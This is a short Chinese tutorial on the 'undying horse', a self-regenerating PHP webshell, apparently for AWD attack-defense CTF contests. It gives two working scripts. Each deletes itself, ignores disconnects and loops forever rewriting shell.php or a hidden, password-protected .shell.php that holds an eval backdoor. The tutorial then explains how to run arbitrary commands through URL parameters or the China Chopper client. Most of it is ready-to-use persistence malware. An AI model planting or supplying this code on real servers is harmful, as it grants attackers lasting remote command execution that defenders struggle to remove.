不死马常用于AWD模式,用于权限维持,首先上传一个不死马,然后访问该页面,就会执行不死马,它会以进程的形式运行,不断的生成文件,即使被发现也不容易被删掉,同时注意上传的目录是否有权限
不死马
<?php set_time_limit(0); //PHP脚本限制了执行时间,set_time_limit(0)设置一个脚本的执行时间为无限长 ignore_user_abort(1); //ignore_user_abort如果设置为 TRUE,则忽略与用户的断开,脚本将继续运行。 unlink(__FILE__); //删除自身 while(1) {
file_put_contents('./shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php sleep(0); //间隔时间 } ?>
上传之后,访问该页面,就会不断生成shell.php,我们就直接可以利用shell.php
同时为了防止别其他人利用,可以进行修改,用md5验证,或者其他利用方法验证,只要不让其他人搭顺风车就可以,在文件前面加个点在Linux系统中变成隐藏文件,以用来隐蔽自己
<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.shell.php'; $code = '<?php if(md5($_GET["passwd"])=="76a2173be6393254e72ffa4d6df1030a"){@eval($_REQUEST[cmd]);} ?>'; while (1){ file_put_contents($file,$code); usleep(5000); } ?>
这样就可以直接利用URL传参.shell.php?passwd=passwd&cmd=你要执行的命令; 或者利用菜刀